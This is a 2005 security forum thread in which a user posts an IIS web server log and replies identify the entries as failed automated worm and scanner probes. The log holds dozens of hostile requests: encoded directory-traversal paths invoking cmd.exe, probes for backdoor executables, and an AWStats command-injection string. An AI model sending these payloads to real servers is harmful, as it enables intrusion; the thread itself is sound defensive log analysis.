-
June 3rd, 2005, 08:26 PM
#1
OMG Is this a logfile of me being hacked on IIS
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2005-03-05 03:01:32
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2005-03-05 03:01:32 192.168.1.108 POST /_vti_bin/_vti_aut/fp30reg.dll - 80 - 66.67.184.150 - 500 0 126
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2005-03-05 05:02:22
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2005-03-05 05:02:22 192.168.1.108 POST /_vti_bin/_vti_aut/fp30reg.dll - 80 - 66.67.235.161 - 500 0 126
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2005-03-05 10:56:17
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2005-03-05 10:56:17 192.168.1.108 HEAD /iisstart.htm - 80 - 68.36.205.30 - 200 0 0
2005-03-05 11:08:09 192.168.1.108 GET /msadc/..../..../..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:09 192.168.1.108 GET /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:10 192.168.1.108 GET /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:11 192.168.1.108 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 500 0 87
2005-03-05 11:08:11 192.168.1.108 GET /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 500 0 87
2005-03-05 11:08:12 192.168.1.108 GET /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:12 192.168.1.108 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:15 192.168.1.108 GET /_vti_bin/............/winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:15 192.168.1.108 GET /c/winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:17 192.168.1.108 GET /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:18 192.168.1.108 GET /adsamples/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:18 192.168.1.108 GET /adsamples/............/winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:18 192.168.1.108 GET /msaDC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:18 192.168.1.108 GET /msadc/..../..../..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:20 192.168.1.108 GET /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:20 192.168.1.108 GET /msadc/..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:20 192.168.1.108 GET /msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:20 192.168.1.108 GET /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:20 192.168.1.108 GET /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 500 0 64
2005-03-05 11:08:21 192.168.1.108 GET /msadc/..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:21 192.168.1.108 GET /msaDC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:21 192.168.1.108 GET /_vti_cnf/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 64
2005-03-05 11:08:22 192.168.1.108 GET /_vti_cnf/............/winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:22 192.168.1.108 GET /msadc/..../..../..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:22 192.168.1.108 GET /scripts/..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:23 192.168.1.108 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:23 192.168.1.108 GET /samples/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:25 192.168.1.108 GET /scripts..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:25 192.168.1.108 GET /d/winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 64
2005-03-05 11:08:25 192.168.1.108 GET /cgi-bin/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 64
2005-03-05 11:08:25 192.168.1.108 GET /cgi-bin/............/winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 64
2005-03-05 11:08:25 192.168.1.108 GET /msadc/..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:25 192.168.1.108 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:25 192.168.1.108 GET /scripts/..%5c%5c../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:25 192.168.1.108 GET /scripts/..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:26 192.168.1.108 GET /samples/............/winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:27 192.168.1.108 GET /scripts/.%2e/.%2e/winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:27 192.168.1.108 GET /scripts/..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:27 192.168.1.108 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:27 192.168.1.108 GET /scripts/..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:29 192.168.1.108 GET /scripts/line.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:29 192.168.1.108 GET /scripts/..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:31 192.168.1.108 GET /msadc/..../..../..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:31 192.168.1.108 GET /scripts/cmd1.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:31 192.168.1.108 GET /scripts/..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:31 192.168.1.108 GET /scripts/bs.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:31 192.168.1.108 GET /scripts/sensepost.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:32 192.168.1.108 GET /scripts/kimroot.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:32 192.168.1.108 GET /scripts/win32.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:32 192.168.1.108 GET /iisadmpwd/..%2f..%2f..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 64
2005-03-05 11:08:34 192.168.1.108 GET /scripts/eXe.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:34 192.168.1.108 GET /scripts/sys.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:34 192.168.1.108 GET /scripts/..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:34 192.168.1.108 GET /scripts/boot.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:34 192.168.1.108 GET /scripts/........winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 64
2005-03-05 11:08:35 192.168.1.108 GET /scripts/lol.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:35 192.168.1.108 GET /scripts/exe.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:35 192.168.1.108 GET /scripts/cmd3.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:35 192.168.1.108 GET /scripts/superlol.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:36 192.168.1.108 GET /scripts/a.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:37 192.168.1.108 GET /scripts/monkey.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:37 192.168.1.108 GET /scripts/max-loh.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:37 192.168.1.108 GET /scripts/winelt.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:37 192.168.1.108 GET /scripts/exchange.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:37 192.168.1.108 GET /msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 64
2005-03-05 11:08:38 192.168.1.108 GET /scripts/rundll.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:38 192.168.1.108 GET /scripts/un.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:38 192.168.1.108 GET /scripts/script.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:38 192.168.1.108 GET /scripts/cmd2.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:38 192.168.1.108 GET /scripts/some.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:38 192.168.1.108 GET /scripts/drone.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:39 192.168.1.108 GET /scripts/serverdata.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:39 192.168.1.108 GET /scripts/****.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:39 192.168.1.108 GET /scripts/Serverdata.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 64
2005-03-05 11:08:39 192.168.1.108 GET /scripts/z.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:39 192.168.1.108 GET /scripts/echo.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 64
2005-03-05 11:08:39 192.168.1.108 GET /scripts/ccc.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:39 192.168.1.108 GET /scripts/sykon.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:39 192.168.1.108 GET /scripts/root1.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:40 192.168.1.108 GET /scripts/smss.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:40 192.168.1.108 GET /scripts/az.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 64
2005-03-05 11:08:40 192.168.1.108 GET /scripts/aagweb.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:43 192.168.1.108 GET /scripts/mkhe.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:43 192.168.1.108 GET /scripts/..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 64
2005-03-05 11:08:45 192.168.1.108 GET /msadc/..../..../..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 64
2005-03-05 11:08:45 192.168.1.108 GET /scripts/root.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 64
2005-03-05 11:08:48 192.168.1.108 GET /scripts/test.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 64
2005-03-05 11:08:49 192.168.1.108 GET /scripts/shell.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 64
2005-03-05 11:08:50 192.168.1.108 GET /msadc/..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 64
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2005-03-05 23:00:37
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2005-03-05 23:00:37 192.168.1.108 GET /cgi-bin/awstats/awstats.pl configdir=|%20id%20| 80 - 206.61.118.236 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) 404 0 3
2005-03-05 23:00:37 192.168.1.108 GET /cgi-bin/awstats.pl configdir=|%20id%20| 80 - 206.61.118.236 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) 404 0 3
2005-03-05 23:00:37 192.168.1.108 GET /cgi/awstats.pl configdir=|%20id%20| 80 - 206.61.118.236 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) 404 0 3
"Do you know why the system is slow?" they ask
"It's probably something to do with..." I look up today's excuse ".. clock speed"
-BOFH
-
June 3rd, 2005, 08:51 PM
#2
Junior Member
It certainly is. Most likely just some worm infected machine somewhere attempting to spread itself. Looks like all the requests recieved a 404 file not found error which is fine. Just make sure your machine is patched and IIS is locked down.
-
June 3rd, 2005, 08:56 PM
#3
I count 5 worms, 2 trojans and one rootkit. Anyone?
[edit] 2 root kits I just did a quick once over
09:F9:11:02:9D:74:E3:5B 8:41:56:C5:63:56:88:C0
-
June 3rd, 2005, 09:01 PM
#4
Short Answer: Looks like a combination of URL scanner and script kiddies. None were successful.
Long Answer:
From your log file, the columns (roughly) are:
Date Time Server IP CMD/URL PORT - Source IP - User-Agent (read browser) HTTP Return code
So...the first thing you should probably be concerned with is the HTTP return code. A quick glance reveals they are all 404 or 500. What is this you might ask ?
A quick check here: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
And 404 means Not Found (as in the file they were after doesn't exist)
And 500 means Internal Server Error (this could be a little something to worry about).
Anyway...other interesting things to note...the user agent that shows up are either Mozilla/?? or Mozilla/4.0+(blah blah). Now this to me is interesting because it indicates the first one has a forged user-agent field, which means it could be changed as it is sent out or most likely indicates a scripted attack. The second is interested because that is a valid user-agent and, if not altered/forged (which it still could be), would tend to indicate it was a directed attack by a user.
The timing on the first (aprox 2-3 s between URLs) would also indicate a scripted attack, so that is where I would lean on that one. The second one is probably just some script kiddie looking for someone who is running awstats and is trying to take advantage of a fairly recent vulnerability that was announced with it.
Lastly, just noticed the first two (not sure how I missed that). Looks like someone was trying to post using front page but it created a server error. This could be for one of many reasons, but regardless was a failed attempt.
There is only one constant, one universal, it is the only real truth: causality. Action. Reaction. Cause and effect...There is no escape from it, we are forever slaves to it. Our only hope, our only peace is to understand it, to understand the 'why'. 'Why' is what separates us from them, you from me. 'Why' is the only real social power, without it you are powerless.
(Merovingian - Matrix Reloaded)
-
June 3rd, 2005, 09:26 PM
#5
Yep, this looks like Nikto at work...
NIKTO README
The IP address of the remote host returns this:
06/03/05 16:24:06 IP block 68.36.205.30
Trying 68.36.205.30 at ARIN
Trying 68.36.205 at ARIN
Comcast Cable Communications, Inc. JUMPSTART-1 (NET-68-32-0-0-1)
68.32.0.0 - 68.63.255.255
Comcast Cable Communications, Inc. NJ-NORTH-1 (NET-68-36-0-0-1)
68.36.0.0 - 68.36.255.255
# ARIN WHOIS database, last updated 2005-06-02 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.
Neb gave you a ton of good info, this is just the cleanup work. A clown on Comcast Cable is where the scan came from.
--TH13
Our scars have the power to remind us that our past was real. -- Hannibal Lecter.
Talent is God given. Be humble. Fame is man-given. Be grateful. Conceit is self-given. Be careful. -- John Wooden
-
June 3rd, 2005, 09:51 PM
#6
I dunno.... It looks like a perfectly normal daily log file entry on a computer that is secured and patched agianst the exploits tried.....
Treanglin: You're fine... get used to them.... Learn to look for the returned error code, (403, 404, 500 etc.). If the error code is above 400 then nothing bad happened except, possibly, some information gathering. However, information gathering will not usually come in a burst like this unless you have an impatient attacker that is simply testing to see if you are vulnerable to any of the old stuff. What this would usually tell you about the attacker is that he probably doesn't fully grasp his NMap and other tools output or that he won't be able to go much further in penetrating your system because he doesn't write his own stuff - if he did he wouldn't be doing such an obvious scan which is what this would be if it weren't a worm.
Don\'t SYN us.... We\'ll SYN you.....
\"A nation that draws too broad a difference between its scholars and its warriors will have its thinking done by cowards, and its fighting done by fools.\" - Thucydides
-
June 3rd, 2005, 09:55 PM
#7
LOL. As Tiger said, this guy isn't very slick. The traffic he threw against your box would be the same as a robber ringing the doorbell before he tried to break in.
Our scars have the power to remind us that our past was real. -- Hannibal Lecter.
Talent is God given. Be humble. Fame is man-given. Be grateful. Conceit is self-given. Be careful. -- John Wooden
-
June 3rd, 2005, 10:08 PM
#8
FSCK, FSCK, FSCK....
Note to Self: Fix Doorbell......
Don\'t SYN us.... We\'ll SYN you.....
\"A nation that draws too broad a difference between its scholars and its warriors will have its thinking done by cowards, and its fighting done by fools.\" - Thucydides
-
June 3rd, 2005, 11:33 PM
#9
Ring Ring, not to mention most new firewalls would have slipped the dead bolt while he was peeking in the front window.
West of House
You are standing in an open field west of a white house, with a boarded front door.
There is a small mailbox here.
-
June 3rd, 2005, 11:43 PM
#10
Originally posted here by thehorse13
LOL. As Tiger said, this guy isn't very slick. The traffic he threw against your box would be the same as a robber ringing the doorbell before he tried to break in.
No respect for common courtesy anymore. If you don't ring the door bell, there is a chance someone is inside. I would ring the door bell, that way if someone answered you act like a salesman and move on.
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|